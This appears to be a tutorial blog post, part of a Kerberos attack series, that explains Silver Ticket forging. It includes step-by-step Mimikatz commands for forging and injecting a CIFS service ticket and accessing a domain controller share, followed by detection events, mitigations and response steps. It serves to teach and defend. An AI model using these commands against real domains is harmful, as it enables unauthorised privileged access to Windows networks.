Kerberos attacks 3-Silver Ticket
Goal
Forge service ticket
Silver Ticket
- Technique to maintain persistence in an already compromised domain
- A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket
- A silver ticket attack involves compromising credentials and abusing the design of the Kerberos protocol.
- A silver ticket only allows an attacker for forge ticket-granting service (TGS) tickets for specific services.
- TGS tickets are encrypted with the password hash for the service – therefore, if an adversary steals the hash for a service account they can mint TGS tickets for that service.
- A attacker can create a Silver Ticket by cracking a computer account password and using that to create a fake authentication ticket. Kerberos allows services to log in without double-checking that their token is actually valid, which attackers have exploited to create Silver Tickets.
Kerberos Authentication Flow
- 1-Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC as an authenticator in the authentication ticket (TGT) request
- 2-KDC checks user information and creates TGT
- 3-The TGT is encrypted, delivered to the user. Only the KRBTGT in the domain can open and read TGT data.
- 4-The User presents the TGT to the DC when requesting a TGS ticket ,The DC opens the TGT & validates PAC checksum –> If the DC can open the ticket & the checksum check out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket.
- 5-The TGS is encrypted using the target service accounts’ NTLM password hash and sent to the user
- 6.The user connects to the server hosting the service & presents the TGS,The service opens the TGS ticket using its NTLM password hash.
Silver Ticket Attacks Work
Silver Ticket Attacks are post-exploitation attacks. That means that a threat actor must already have compromised a target system in the environment before they can generate a Kerberos Silver Ticket.
- 1-gather information about the domain, such as the domain name and domain security identifier (SID)
- 2-Obtain the DNS name under which the service principal name (SPN) for the targeted
- 3-Use Mimikatz to obtain the local NTLM password (or password hash) for the Kerberos service running on the compromised system
- 4-Use Mimikatz to forge a Kerberos TGS
Argument
kerberos::golden ##Name of the module (there is no Silver module)
/User:Administrator ##Username for which the TGT is generated
/domain :karim.net ## Domain Name
/sid:S-1-5-21-750046758-1551849808-2392872301 ## SID of the domain
/target : win10.karim.net ## Target machine
/service: cifs The SPN name of service for which TGS is to be created
/rc4:6f5b5acaf7433b3282ac22e21e62ff22 ## NTLM hash of the service account.
/id:500 /groups:512 ## Optional User RID (default 500) and Group (default 513 512 520 518 519)
/ptt ##Injects the ticket in current PowerShell process, no to save the ticket on disk
/startoffset:0 (Optional)the start offset when the ticket is available (default 0)
/endin:600 ##Optional ticket lifetime (default is 10 years) . The default AD setting is 10 hours = 600 minutes
/renewmax:10080 ##Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800
group identifier
512 ##Domain Admins
513 ##Domain Users
518 ##Schema Admins
519 ##Enterprise Admins
520 ##Group Policy Creator Owners
Getting a user’s SID
whoami /user
Create the silver ticket
kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500 /ptt
List current tickets
klist
save ticket in file
kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500
Inject in memory using mimikatz
kerberos::ptt ticket.kirbi
Access domain controller
dir \\domainAD.karim.net\c$
Detect
- The normal process of obtaining a TGS ticket involves asking a domain controller to generate one.
- After the client proves their identity, the domain controller with reply with a TGS encrypted with the service account password.
- detecting silver tickets is only possible on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as: usernames that don’t exist, modified group memberships (added or removed)
- The Account Domain field is blank when it should be DOMAIN
- The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
- Events:
- 4624 Account Logon
- 4634 Account Logoff
- 4672 Admin Logon
Mitigate
several mitigations exist that can make it harder for an adversary to compromise service account password hashes.
- Protect assets (especially the domain controller)
- Same mitigations as for kerberoastig apply
- Reduce administrative access to member workstations and servers to the least required.
- Remove end-user administrative privileges on member workstations.
- Adopt strong password hygiene practices for service accounts.
- Do not allow users to possess administrative privileges across security boundaries.
Respond
If a silver ticket is detected, several response actions can be taken:
- Activate the incident response process and alert the incident response team.
- Reset the password of the compromised service account.
I finished part 3 in Kerberos attacks today waite me in the next part.